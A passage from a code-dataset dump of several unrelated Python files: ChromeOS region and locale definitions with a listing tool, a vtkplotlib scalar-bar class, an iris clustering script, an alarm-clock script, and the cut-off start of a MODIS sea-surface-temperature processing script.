'Pacific/Fiji', ['en-FJ', 'fj'], KML.ANSI,\n 'Fiji'),\n Region(\n 'fk', 'xkb:fk::eng', 'Atlantic/Stanley', 'en-FK', KML.ANSI,\n 'Falkland Islands'),\n Region(\n 'fm', 'xkb:fm::eng', [\n 'Pacific/Chuuk', 
'Pacific/Pohnpei', 'Pacific/Kosrae'], [\n 'en-FM', 'chk', 'pon', 'yap', 'kos', 'uli', 'woe', 'nkr',\n 'kpg'], KML.ANSI,\n 'Micronesia'),\n Region(\n 'fo', 'xkb:fo::fao', 'Atlantic/Faroe', ['fo', 'da-FO'], KML.ANSI,\n 'Faroe Islands'),\n Region(\n 'ni', 'xkb:latam::spa', 'America/Managua', ['es-419', 'en'], KML.ANSI,\n 'Nicaragua'),\n Region(\n 'no', 'xkb:no::nor', 'Europe/Oslo', ['no', 'nb', 'nn', 'se'], KML.ISO,\n 'Norway'),\n Region(\n 'na', 'xkb:na::eng', 'Africa/Windhoek', ['en-NA', 'af', 'de', 'hz',\n 'naq'], KML.ANSI,\n 'Namibia'),\n Region(\n 'vu', 'xkb:vu::bis', 'Pacific/Efate', ['bi', 'en-VU'], KML.ANSI,\n 'Vanuatu'),\n Region(\n 'nc', 'xkb:nc::fra', 'Pacific/Noumea', 'fr-NC', KML.ANSI,\n 'New Caledonia'),\n Region(\n 'ne', 'xkb:ne::fra', 'Africa/Niamey', ['fr-NE', 'ha', 'kr'], KML.ANSI,\n 'Niger'),\n Region(\n 'nf', 'xkb:nf::eng', 'Pacific/Norfolk', 'en-NF', KML.ANSI,\n 'Norfolk Island'),\n Region(\n 'np', 'xkb:np::nep', 'Asia/Kathmandu', ['ne', 'en'], KML.ANSI,\n 'Nepal'),\n Region(\n 'nr', 'xkb:nr::nau', 'Pacific/Nauru', ['na', 'en-NR'], KML.ANSI,\n 'Nauru'),\n Region(\n 'nu', 'xkb:us::eng', 'Pacific/Niue', ['niu', 'en-NU'], KML.ANSI,\n 'Niue'),\n Region(\n 'ck', 'xkb:ck::eng', 'Pacific/Rarotonga', ['en-CK', 'mi'], KML.ANSI,\n 'Cook Islands'),\n Region(\n 'ci', 'xkb:ci::fra', 'Africa/Abidjan', 'fr-CI', KML.ANSI,\n 'Ivory Coast'),\n Region(\n 'cn', 'xkb:us::eng', 'Asia/Shanghai', 'zh-CN', KML.ANSI,\n 'China'),\n Region(\n 'cm', 'xkb:cm::eng', 'Africa/Douala', ['en-CM', 'fr-CM'], KML.ANSI,\n 'Cameroon'),\n Region(\n 'cc', 'xkb:cc::msa', 'Indian/Cocos', ['ms-CC', 'en'], KML.ANSI,\n 'Cocos Islands'),\n Region(\n 'cg', 'xkb:cg::fra', 'Africa/Brazzaville', ['fr-CG', 'kg'], KML.ANSI,\n 'Republic of the Congo'),\n Region(\n 'cf', 'xkb:cf::fra', 'Africa/Bangui', ['fr-CF', 'sg', 'ln'], KML.ANSI,\n 'Central African Republic'),\n Region(\n 'cd', 'xkb:cd::fra', ['Africa/Kinshasa', 'Africa/Lubumbashi'], [\n 'fr-CD', 'ln', 'kg'], KML.ANSI,\n 'Democratic Republic of the Congo'),\n Region(\n 'cy', 'xkb:cy::ell', 'Asia/Nicosia', ['el-CY', 'tr-CY'], KML.ANSI,\n 'Cyprus'),\n Region(\n 'cx', 'xkb:cx::eng', 'Indian/Christmas', ['en', 'zh'], KML.ANSI,\n 'Christmas Island'),\n Region(\n 'cr', 'xkb:latam::spa', 'America/Costa_Rica', ['es-419'], KML.ANSI,\n 'Costa Rica'),\n Region(\n 'cw', 'xkb:cw::nld', 'America/Curacao', ['nl'], KML.ANSI, 'Curacao'),\n Region(\n 'cv', 'xkb:cv::por', 'Atlantic/Cape_Verde', 'pt-CV', KML.ANSI,\n 'Cape Verde'),\n Region(\n 'cu', 'xkb:latam::spa', 'America/Havana', 'es-419', KML.ANSI,\n 'Cuba'),\n Region(\n 'sz', 'xkb:sz::eng', 'Africa/Mbabane', ['en-SZ', 'ss-SZ'], KML.ANSI,\n 'Swaziland'),\n Region(\n 'sy', 'xkb:sy::ara', 'Asia/Damascus', ['ar', 'ku', 'hy', 'arc', 'fr',\n 'en'], KML.ANSI,\n 'Syria'),\n Region(\n 'sx', 'xkb:sx::nld', 'America/Lower_Princes', ['nl', 'en'], KML.ANSI,\n 'Sint Maarten'),\n Region(\n 'kg', 'xkb:kg::kir', 'Asia/Bishkek', ['ky', 'uz', 'ru'], KML.ANSI,\n 'Kyrgyzstan'),\n Region(\n 'ke', 'xkb:ke::eng', 'Africa/Nairobi', ['en-KE', 'sw-KE'], KML.ANSI,\n 'Kenya'),\n Region(\n 'ss', 'xkb:ss::eng', 'Africa/Juba', 'en', KML.ANSI,\n 'South Sudan'),\n Region(\n 'sr', 'xkb:sr::nld', 'America/Paramaribo', ['nl-SR', 'en', 'srn', 'hns',\n 'jv'], KML.ANSI,\n 'Suriname'),\n Region(\n 'ki', 'xkb:ki::eng', ['Pacific/Tarawa', 'Pacific/Enderbury',\n 'Pacific/Kiritimati'], ['en-KI', 'gil'], KML.ANSI,\n 'Kiribati'),\n Region(\n 'kh', 'xkb:kh::khm', 'Asia/Phnom_Penh', ['km', 'fr', 'en'], KML.ANSI,\n 'Cambodia'),\n Region(\n 'kn', 'xkb:kn::eng', 'America/St_Kitts', 
'en-KN', KML.ANSI,\n 'Saint Kitts and Nevis'),\n Region(\n 'km', 'xkb:km::ara', 'Indian/Comoro', ['ar', 'fr-KM'], KML.ANSI,\n 'Comoros'),\n Region(\n 'st', 'xkb:st::por', 'Africa/Sao_Tome', 'pt-ST', KML.ANSI,\n 'Sao Tome and Principe'),\n Region(\n 'si', 'xkb:si::slv', 'Europe/Ljubljana', ['sl', 'hu', 'it', 'sr', 'de',\n 'hr', 'en-GB'], KML.ISO,\n 'Slovenia'),\n Region(\n 'kp', 'xkb:kp::kor', 'Asia/Pyongyang', 'ko-KP', KML.ANSI,\n 'North Korea'),\n Region(\n 'sn', 'xkb:sn::fra', 'Africa/Dakar', ['fr-SN', 'wo', 'fuc'], KML.ANSI,\n 'Senegal'),\n Region(\n 'sm', 'xkb:sm::ita', 'Europe/San_Marino', 'it-SM', KML.ANSI,\n 'San Marino'),\n Region(\n 'sl', 'xkb:sl::eng', 'Africa/Freetown', ['en-SL', 'men'], KML.ANSI,\n 'Sierra Leone'),\n Region(\n 'sc', 'xkb:sc::eng', 'Indian/Mahe', ['en-SC', 'fr-SC'], KML.ANSI,\n 'Seychelles'),\n Region(\n 'kz', 'xkb:kz::kaz', ['Asia/Almaty', 'Asia/Qyzylorda', 'Asia/Aqtobe',\n 'Asia/Aqtau'], ['kk', 'ru'], KML.ANSI,\n 'Kazakhstan'),\n Region(\n 'ky', 'xkb:ky::eng', 'America/Cayman', 'en-KY', KML.ANSI,\n 'Cayman Islands'),\n Region(\n 'sd', 'xkb:sd::ara', 'Africa/Khartoum', ['ar', 'en', 'fia'], KML.ANSI,\n 'Sudan'),\n Region(\n 'do', 'xkb:latam::spa', 'America/Santo_Domingo', 'es-419', KML.ANSI,\n 'Dominican Republic'),\n Region(\n 'dm', 'xkb:dm::eng', 'America/Dominica', 'en-DM', KML.ANSI,\n 'Dominica'),\n Region(\n 'dj', 'xkb:dj::fra', 'Africa/Djibouti', ['fr-DJ', 'ar'], KML.ANSI,\n 'Djibouti'),\n Region(\n 'dk', 'xkb:dk::dan', 'Europe/Copenhagen', ['da-DK', 'en', 'fo',\n 'de-DK'], KML.ISO,\n 'Denmark'),\n Region(\n 'vg', 'xkb:vg::eng', 'America/Tortola', 'en-VG', KML.ANSI,\n 'British Virgin Islands'),\n Region(\n 'ye', 'xkb:ye::ara', 'Asia/Aden', 'ar', KML.ANSI,\n 'Yemen'),\n Region(\n 'dz', 'xkb:dz::ara', 'Africa/Algiers', 'ar', KML.ANSI,\n 'Algeria'),\n Region(\n 'yt', 'xkb:yt::fra', 'Indian/Mayotte', 'fr-YT', KML.ANSI,\n 'Mayotte'),\n Region(\n 'um', 'xkb:um::eng', ['Pacific/Johnston', 'Pacific/Midway',\n 'Pacific/Wake'], 'en-UM', KML.ANSI,\n 'United States Minor Outlying Islands'),\n Region(\n 'lb', 'xkb:lb::ara', 'Asia/Beirut', ['ar', 'fr-LB', 'en'], KML.ANSI,\n 'Lebanon'),\n Region(\n 'lc', 'xkb:lc::eng', 'America/St_Lucia', 'en-LC', KML.ANSI,\n 'Saint Lucia'),\n Region(\n 'la', 'xkb:la::lao', 'Asia/Vientiane', ['lo', 'fr', 'en'], KML.ANSI,\n 'Laos'),\n Region(\n 'tv', 'xkb:us::eng', 'Pacific/Funafuti', ['tvl', 'en', 'sm'], KML.ANSI,\n 'Tuvalu'),\n Region(\n 'tt', 'xkb:tt::eng', 'America/Port_of_Spain', ['en-TT', 'hns', 'fr',\n 'es', 'zh'], KML.ANSI,\n 'Trinidad and Tobago'),\n Region(\n 'lk', 'xkb:lk::sin', 'Asia/Colombo', ['si', 'ta', 'en'], KML.ANSI,\n 'Sri Lanka'),\n Region(\n 'li', 'xkb:ch::ger', 'Europe/Vaduz', ['de', 'en-GB'], KML.ISO,\n 'Liechtenstein'),\n Region(\n 'lv', 'xkb:lv:apostrophe:lav', 'Europe/Riga', ['lv', 'lt', 'ru',\n 'en-GB'], KML.ISO,\n 'Latvia'),\n Region(\n 'to', 'xkb:to::ton', 'Pacific/Tongatapu', ['to', 'en-TO'], KML.ANSI,\n 'Tonga'),\n Region(\n 'lt', 'xkb:lt::lit', 'Europe/Vilnius', ['lt', 'ru', 'pl'], KML.ISO,\n 'Lithuania'),\n Region(\n 'lu', 'xkb:lu::ltz', 'Europe/Luxembourg', ['lb', 'de-LU'], KML.ANSI,\n 'Luxembourg'),\n Region(\n 'lr', 'xkb:lr::eng', 'Africa/Monrovia', 'en-LR', KML.ANSI,\n 'Liberia'),\n Region(\n 'ls', 'xkb:ls::eng', 'Africa/Maseru', ['en-LS', 'st', 'zu'], KML.ANSI,\n 'Lesotho'),\n Region(\n 'tf', 'xkb:tf::fra', 'Indian/Kerguelen', 'fr', KML.ANSI,\n 'French Southern Territories'),\n Region(\n 'tg', 'xkb:tg::fra', 'Africa/Lome', ['fr-TG', 'ee', 'hna'], KML.ANSI,\n 'Togo'),\n Region(\n 'td', 'xkb:td::fra', 
'Africa/Ndjamena', ['fr-TD', 'ar'], KML.ANSI,\n 'Chad'),\n Region(\n 'tc', 'xkb:tc::eng', 'America/Grand_Turk', 'en-TC', KML.ANSI,\n 'Turks and Caicos Islands'),\n Region(\n 'ly', 'xkb:ly::ara', 'Africa/Tripoli', ['ar', 'it', 'en'], KML.ANSI,\n 'Libya'),\n Region(\n 'va', 'xkb:va::lat', 'Europe/Vatican', ['la', 'it', 'fr'], KML.ANSI,\n 'Vatican'),\n Region(\n 'vc', 'xkb:vc::eng', 'America/St_Vincent', ['en-VC', 'fr'], KML.ANSI,\n 'Saint Vincent and the Grenadines'),\n Region(\n 'ad', 'xkb:ad::cat', 'Europe/Andorra', 'ca', KML.ANSI,\n 'Andorra'),\n Region(\n 'ag', 'xkb:ag::eng', 'America/Antigua', 'en-AG', KML.ANSI,\n 'Antigua and Barbuda'),\n Region(\n 'af', 'xkb:af::fas', 'Asia/Kabul', ['fa-AF', 'ps'], KML.ANSI,\n 'Afghanistan'),\n Region(\n 'ai', 'xkb:ai::eng', 'America/Anguilla', 'en-AI', KML.ANSI,\n 'Anguilla'),\n Region(\n 'vi', 'xkb:vi::eng', 'America/St_Thomas', 'en-VI', KML.ANSI,\n 'U.S. Virgin Islands'),\n Region(\n 'ir', 'xkb:ir::fas', 'Asia/Tehran', ['fa-IR', 'ku'], KML.ANSI,\n 'Iran'),\n Region(\n 'am', 'xkb:am::hye', 'Asia/Yerevan', 'hy', KML.ANSI,\n 'Armenia'),\n Region(\n 'al', 'xkb:al::sqi', 'Europe/Tirane', ['sq', 'el'], KML.ANSI,\n 'Albania'),\n Region(\n 'ao', 'xkb:ao::por', 'Africa/Luanda', 'pt-AO', KML.ANSI,\n 'Angola'),\n Region(\n 'as', 'xkb:as::eng', 'Pacific/Pago_Pago', ['en-AS', 'sm'], KML.ANSI,\n 'American Samoa'),\n Region(\n 'aw', 'xkb:aw::nld', 'America/Aruba', ['nl-AW', 'es', 'en'], KML.ANSI,\n 'Aruba'),\n Region(\n 'ax', 'xkb:ax::swe', 'Europe/Mariehamn', 'sv-AX', KML.ANSI,\n 'Aland Islands'),\n Region(\n 'az', 'xkb:az::aze', 'Asia/Baku', ['az', 'ru', 'hy'], KML.ANSI,\n 'Azerbaijan'),\n Region(\n 'ua', 'xkb:ua::ukr', [\n 'Europe/Kiev', 'Europe/Uzhgorod', 'Europe/Zaporozhye'], [\n 'uk', 'ru-UA', 'rom', 'pl', 'hu'], KML.ANSI,\n 'Ukraine'),\n Region(\n 'qa', 'xkb:qa::ara', 'Asia/Bahrain', ['ar', 'en'], KML.ANSI,\n 'Qatar'),\n Region(\n 'mz', 'xkb:mz::por', 'Africa/Maputo', ['pt-MZ', 'vmw'], KML.ANSI,\n 'Mozambique'),\n ]\n\"\"\"A list of :py:class:`regions.Region` objects for\n**unconfirmed** regions. These may contain incorrect information (or not\nsupported by Chrome browser yet), and all fields must be reviewed before launch.\nSee http://goto/vpdsettings.\n\nCurrently, non-Latin keyboards must use an underlying Latin keyboard\nfor VPD. (This assumption should be revisited when moving items to\n:py:data:`regions.Region.REGIONS_LIST`.) This is\ncurrently being discussed on .\n\nSome timezones or locales may be missing from ``timezone_settings.cc`` (see\nhttp://crosbug.com/p/23902). This must be rectified before moving\nitems to :py:data:`regions.Region.REGIONS_LIST`.\n\"\"\"\n\n\ndef ConsolidateRegions(regions):\n \"\"\"Consolidates a list of regions into a dict.\n\n Args:\n regions: A list of Region objects. 
All objects for any given\n region code must be identical or we will throw an exception.\n (We allow duplicates in case identical region objects are\n defined in both regions.py and the overlay, e.g., when moving\n items to the public overlay.)\n\n Returns:\n A dict from region code to Region.\n\n Raises:\n RegionException: If there are multiple regions defined for a given\n region, and the values for those regions differ.\n \"\"\"\n # Build a dict from region_code to the first Region with that code.\n region_dict = {}\n for r in regions:\n existing_region = region_dict.get(r.region_code)\n if existing_region:\n if existing_region.GetFieldsDict() != r.GetFieldsDict():\n raise RegionException(\n 'Conflicting definitions for region %r: %r, %r' %\n (r.region_code, existing_region.GetFieldsDict(),\n r.GetFieldsDict()))\n else:\n region_dict[r.region_code] = r\n\n return region_dict\n\n\ndef BuildRegionsDict(include_all=False):\n \"\"\"Builds a dictionary mapping from code to :py:class:`regions.Region` object.\n\n The regions include:\n\n * :py:data:`regions.REGIONS_LIST`\n * :py:data:`regions_overlay.REGIONS_LIST`\n * Only if ``include_all`` is true:\n\n * :py:data:`regions.UNCONFIRMED_REGIONS_LIST`\n * :py:data:`regions.INCOMPLETE_REGIONS_LIST`\n\n A region may only appear in one of the above lists, or this function\n will (deliberately) fail.\n \"\"\"\n regions = list(REGIONS_LIST)\n if include_all:\n known_codes = [r.region_code for r in regions]\n regions += [r for r in UNCONFIRMED_REGIONS_LIST if r.region_code not in\n known_codes]\n\n # Build dictionary of region code to list of regions with that\n # region code. Check manually for duplicates, since the region may\n # be present both in the overlay and the public repo.\n return ConsolidateRegions(regions)\n\n\nREGIONS = BuildRegionsDict()\n\n\ndef main(args=sys.argv[1:], out=None):\n parser = argparse.ArgumentParser(description=(\n 'Display all known regions and their parameters. 
'))\n parser.add_argument('--format',\n choices=('human-readable', 'csv', 'json', 'yaml'),\n default='human-readable',\n help='Output format (default=%(default)s)')\n parser.add_argument('--all', action='store_true',\n help='Include unconfirmed and incomplete regions')\n parser.add_argument('--notes', action='store_true',\n help='Include notes in output')\n parser.add_argument('--output', default=None,\n help='Specify output file')\n parser.add_argument('--overlay', default=None,\n help='Specify a Python file to overlay extra data')\n args = parser.parse_args(args)\n\n if args.overlay is not None:\n execfile(args.overlay)\n\n if args.all:\n # Add an additional 'confirmed' property to help identifying region status,\n # for autotests, unit tests and factory module.\n Region.FIELDS.insert(1, 'confirmed')\n for r in REGIONS_LIST:\n r.confirmed = True\n for r in UNCONFIRMED_REGIONS_LIST:\n r.confirmed = False\n\n regions_dict = BuildRegionsDict(args.all)\n\n if out is None:\n if args.output is None:\n out = sys.stdout\n else:\n out = open(args.output, 'w')\n\n if args.notes or args.format == 'csv':\n Region.FIELDS += ['notes']\n\n # Handle YAML and JSON output.\n if args.format == 'yaml' or args.format == 'json':\n data = {}\n for region in regions_dict.values():\n item = {}\n for field in Region.FIELDS:\n item[field] = getattr(region, field)\n data[region.region_code] = item\n if args.format == 'yaml':\n yaml.dump(data, out)\n else:\n json.dump(data, out)\n return\n\n # Handle CSV or plain-text output: build a list of lines to print.\n lines = [Region.FIELDS]\n\n def CoerceToString(value):\n \"\"\"Returns the arguments in simple string type.\n\n If value is a list, concatenate its values with commas. Otherwise, just\n return value.\n \"\"\"\n if isinstance(value, list):\n return ','.join(value)\n else:\n return str(value)\n\n for region in sorted(regions_dict.values(), key=lambda v: v.region_code):\n lines.append([CoerceToString(getattr(region, field))\n for field in Region.FIELDS])\n\n if args.format == 'csv':\n # Just print the lines in CSV format. Note the values may include ',' so the\n # separator must be tab.\n for l in lines:\n print('\\t'.join(l))\n elif args.format == 'human-readable':\n num_columns = len(lines[0])\n\n # Calculate maximum length of each column.\n max_lengths = []\n for column_no in xrange(num_columns):\n max_lengths.append(max(len(line[column_no]) for line in lines))\n\n # Print each line, padding as necessary to the max column length.\n for line in lines:\n for column_no in xrange(num_columns):\n out.write(line[column_no].ljust(max_lengths[column_no] + 2))\n out.write('\\n')\n else:\n sys.exit('Sorry, unknown format specified: %s' % args.format)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"regions/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":47876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
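A minimal, self-contained sketch of the duplicate rule that ConsolidateRegions enforces in the record above: identical duplicate definitions are merged, conflicting ones raise. The namedtuple Region here is a stand-in for the real class, not the one from regions.py.

from collections import namedtuple

Region = namedtuple('Region', ['region_code', 'keyboard', 'time_zone'])

def consolidate(regions):
    # duplicates are tolerated only when field-for-field identical
    region_dict = {}
    for r in regions:
        existing = region_dict.get(r.region_code)
        if existing is not None and existing != r:
            raise ValueError('Conflicting definitions for region %r' % r.region_code)
        region_dict[r.region_code] = r
    return region_dict

dup = [Region('us', 'xkb:us::eng', 'America/Los_Angeles')] * 2
print(sorted(consolidate(dup)))  # ['us']: identical duplicates are merged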
+{"seq_id":"129732888","text":"# -*- coding: utf-8 -*-\r\n# =============================================================================\r\n# Created on Sun Jul 21 15:29:19 2019\r\n#\r\n# @author: Brénainn Woodsend\r\n#\r\n#\r\n# ScalarBar.py adds a scalar/color bar.\r\n# Copyright (C) 2019 Brénainn Woodsend\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n# =============================================================================\r\n\r\nfrom builtins import super\r\n\r\nimport vtk\r\nimport numpy as np\r\n\r\nfrom vtkplotlib.plots.BasePlot import Actor2Base\r\n\r\n\r\n\r\nclass ScalarBar(Actor2Base):\r\n \"\"\"Create a scalar bar. Also goes by the alias `colorbar`.\r\n\r\n :param plot: The plot with scalars to draw a scalarbar for.\r\n\r\n :param title: , defaults to ''.\r\n :type title: str, optional\r\n\r\n :param fig: The figure to plot into, can be None, defaults to vpl.gcf().\r\n :type fig: vpl.figure, vpl.QtFigure, optional\r\n\r\n\r\n :return: The scalarbar object.\r\n :rtype: vtkplotlib.plots.ScalarBar.ScalarBar\r\n\r\n\r\n The `plot` argument can be the output of any ``vpl.***`` command that takes\r\n `scalars` as an argument.\r\n\r\n \"\"\"\r\n def __init__(self, plot, title=\"\", fig=\"gcf\"):\r\n\r\n super().__init__(fig)\r\n\r\n self.actor = vtk.vtkScalarBarActor()\r\n self.actor.SetTitle(title)\r\n\r\n self.actor.SetNumberOfLabels(6)\r\n\r\n self.__actor2d_init__()\r\n\r\n self.lookup_table = plot.mapper.GetLookupTable()\r\n if self.lookup_table.GetTable().GetNumberOfTuples() == 0:\r\n # ForceBuild resets it as well as building it. Thus overwriting any\r\n # existing colormap. Only build if it has not already been built.\r\n self.lookup_table.ForceBuild()\r\n self.actor.SetLookupTable(self.lookup_table)\r\n\r\n\r\n# self.fig += self\r\n self.fig.renderer.AddActor2D(self.actor)\r\n self.fig.plots.add(self)\r\n\r\n self.set_horizontal = self.actor.SetOrientationToHorizontal\r\n self.set_vertical = self.actor.SetOrientationToVertical\r\n\r\n\r\n\r\n\r\ndef test():\r\n from stl.mesh import Mesh\r\n import vtkplotlib as vpl\r\n\r\n mesh = Mesh.from_file(vpl.data.get_rabbit_stl())\r\n plot = vpl.mesh_plot(mesh, scalars=mesh.x)\r\n\r\n self = vpl.scalar_bar(plot, \"X Values\")\r\n\r\n vpl.show()\r\n\r\n globals().update(locals())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n test()\r\n\r\n","sub_path":"venv/lib/python3.7/site-packages/vtkplotlib/plots/ScalarBar.py","file_name":"ScalarBar.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"640993015","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn import datasets\nfrom matplotlib import pyplot as Plot\nimport time\n\nnp.random.seed(5)\n\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\nno_of_clusters = 3\n\nstart_time = time.time()\nagglomerative_clustering = AgglomerativeClustering(n_clusters=no_of_clusters, linkage='average').fit(X)\nend_time = time.time()\n\nfinal_labels = agglomerative_clustering.labels_\n\n# PLOTTING THE KMEANS 3D PLOT\n\nPlot.figure(1, figsize=(14, 12))\nPlot.clf()\ncolor_map = Plot.cm.get_cmap('RdYlBu')\nspecies = ['Setosa','Versicolor','Virginica']\nformatter = Plot.FuncFormatter(lambda i, *args: species[i])\n\nfig2 = Plot.figure(1, figsize=(14, 12))\nax = Axes3D(fig2, elev=-165, azim=5)\nax.scatter(X[:, 1], X[:, 2], X[:, 3], c=final_labels, cmap=color_map, edgecolor='k', s=40)\nax.set_title(\"Agglomerative Clustering\")\nax.set_xlabel(\"Sepal Width\")\nax.w_xaxis.set_ticklabels([])\nax.set_ylabel(\"Petal Length\")\nax.w_yaxis.set_ticklabels([])\nax.set_zlabel(\"Petal Width\")\nax.w_zaxis.set_ticklabels([])\nPlot.show()\n\nag_centroid = [[np.zeros(4),0],[np.zeros(4),0],[np.zeros(4),0]]\n\nfor i in range(len(final_labels)) :\n ag_centroid[final_labels[i]][0] = ag_centroid[final_labels[i]][0] + np.array(X[i])\n ag_centroid[final_labels[i]][1] += 1\n\niris_centroid = [[np.zeros(4),0],[np.zeros(4),0],[np.zeros(4),0]]\n\nfor i in range(len(y)) :\n iris_centroid[y[i]][0] = iris_centroid[y[i]][0] + np.array(X[i])\n iris_centroid[y[i]][1] += 1\n\noriginal_centroids = [(i[0]/i[1]) for i in iris_centroid]\nagglomerative_centroids = [(i[0]/i[1]) for i in ag_centroid]\nag_to_original = {0:None, 1:None, 2:None}\n\nfor i in range(len(agglomerative_centroids)) :\n minimum = [None,10000000]\n for j in range(len(original_centroids)) :\n temp = np.linalg.norm(agglomerative_centroids[i]-np.array(original_centroids[j]))\n if temp < minimum[1] :\n minimum[1] = temp\n minimum[0] = j\n ag_to_original[i] = minimum[0]\n\nerror_agg = 0\nfor i in range(len(final_labels)) :\n if y[i] != ag_to_original[final_labels[i]] :\n error_agg += 1\nerror_agg = error_agg*100/len(y)\n\nprint(\"Time to execute Agglomerative Clustering Algorithm :\",end_time - start_time)\nprint(\"Error in Marking Correct via Agglomerative Clustering is\",error_agg,\"%\")\n","sub_path":"Project 2 (EDA & Unsupervised Learning)/Code_and_Plots/agglomerativeClusteringScikit.py","file_name":"agglomerativeClusteringScikit.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"395934145","text":"import datetime\r\nimport winsound\r\nalarm_hour = int(input(\"What hour do you want ot wake up?\"))\r\nalarm_minute = int(input(\"What minute do you want ot wake up?\"))\r\nam_pm = str(input(\"pm or am?\"))\r\n\r\nif am_pm == \"pm\":\r\n alarm_hour = alarm_hour + 12\r\n\r\nwhile True:\r\n if alarm_hour == datetime.datetime.now().hour and alarm_minute == datetime.datetime.now().minute:\r\n print(\"Wake up\")\r\n winsound.PlaySound(\"Music\", winsound.SND_FILENAME)\r\n break\r\nprint(\"exit\")\r\n","sub_path":"Alarm.py","file_name":"Alarm.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"510978608","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nCreated on Wed Oct 21 14:38:31 2020\n@author: guitar79\ncreated by Kevin\n#Open hdf file\nNameError: name 'SD' is not defined\nconda install -c conda-forge pyhdf\n\nrunfile('./classify_MODIS_hdf_MP-01.py', 'daily 2011', wdir='./KOSC_MODIS_SST_Python/')\n\nlen(npy_data[795,183])\nnp.mean(npy_data[795,183])\n\nhdf_data = np.load(f_name1, allow_pickle=True)\n\n'''\n\nfrom glob import glob\nfrom datetime import datetime\nimport numpy as np\nimport os\nimport sys\nfrom sys import argv\nimport _MODIS_AOD_utilities\n\n#script, L3_perid, yr = argv # Input L3_perid : 'weekly' 'monthly' 'daily'\nprint(\"argv: {}\".format(argv))\nif len(argv) < 3 :\n print (\"len(argv) < 2\\nPlease input L3_perid and year \\n ex) aaa.py daily 2016\\n ex) aaa.py weekly 2016\\n ex) aaa.py monthly 2016\")\n sys.exit()\nelif len(argv) > 3 :\n print (\"len(argv) > 2\\nPlease input L3_perid and year \\n ex) aaa.py daily 2016\\n ex) aaa.py weekly 2016\\n ex) aaa.py monthly 2016\")\n sys.exit()\nelif argv[1] == 'daily' or argv[1] == 'weekly' or argv[1] == 'monthly' :\n L3_perid, yr = argv[1], int(argv[2])\n print(\"{}, {} processing started...\".format(argv[1], argv[2]))\nelse :\n print(\"Please input L3_perid and year \\n ex) aaa.py daily 2016\\n ex) aaa.py weekly 2016\\n ex) aaa.py monthly 2016\")\n sys.exit()\n#L3_perid, yr = \"daily\", 2019\nadd_log = True\nif add_log == True :\n log_file = 'MODIS_SST_python.log'\n err_log_file = 'MODIS_SST_python.log'\n \nDATAFIELD_NAME = \"sst\"\n#Set lon, lat, resolution\nLlon, Rlon = 110, 150\nSlat, Nlat = 10, 60\nresolution = 0.1\nbase_dir_name = '../MODIS_L2_SST/'\nsave_dir_name = \"../{0}_L3/{0}_{1}_{2}_{3}_{4}_{5}_{6}/\".format(DATAFIELD_NAME, str(Llon), str(Rlon),\n str(Slat), str(Nlat), str(resolution), L3_perid)\nif not os.path.exists(save_dir_name):\n os.makedirs(save_dir_name)\n print ('*'*80)\n print (save_dir_name, 'is created')\nelse :\n print ('*'*80)\n print (save_dir_name, 'is exist')\n\nyears = range(yr, yr+1)\n\nproc_dates = []\n\n#make processing period tuple\nfor year in years:\n dir_name = base_dir_name + str(year) + '/'\n\n from dateutil.relativedelta import relativedelta\n s_start_date = datetime(year, 1, 1) #convert startdate to date type\n s_end_date = datetime(year+1, 1, 1)\n\n k=0\n date1 = s_start_date\n date2 = s_start_date\n \n while date2 < s_end_date :\n k += 1\n if L3_perid == 'daily' :\n date2 = date1 + relativedelta(days=1)\n elif L3_perid == 'weekly' :\n date2 = date1 + relativedelta(days=8)\n elif L3_perid == 'monthly' :\n date2 = date1 + relativedelta(months=1)\n\n date = (date1, date2, k)\n proc_dates.append(date)\n date1 = date2\n\n#### make dataframe from file list\nfullnames = sorted(glob(os.path.join(base_dir_name, '*.hdf')))\n\nfullnames_dt = []\nfor fullname in fullnames :\n fullnames_dt.append(MODIS_hdf_utilities.fullname_to_datetime_for_KOSC_MODIS_SST(fullname))\n\nimport pandas as pd \n\nlen(fullnames)\nlen(fullnames_dt)\n\n# Calling DataFrame constructor on list \ndf = pd.DataFrame({'fullname':fullnames,'fullname_dt':fullnames_dt})\ndf.index = df['fullname_dt']\ndf\n\nfor proc_date in proc_dates:\n\n df_proc = df[(df['fullname_dt'] >= proc_date[0]) & (df['fullname_dt'] < proc_date[1])]\n \n if os.path.exists('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_alldata.npy'\\\n .format(save_dir_name, DATAFIELD_NAME, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), 
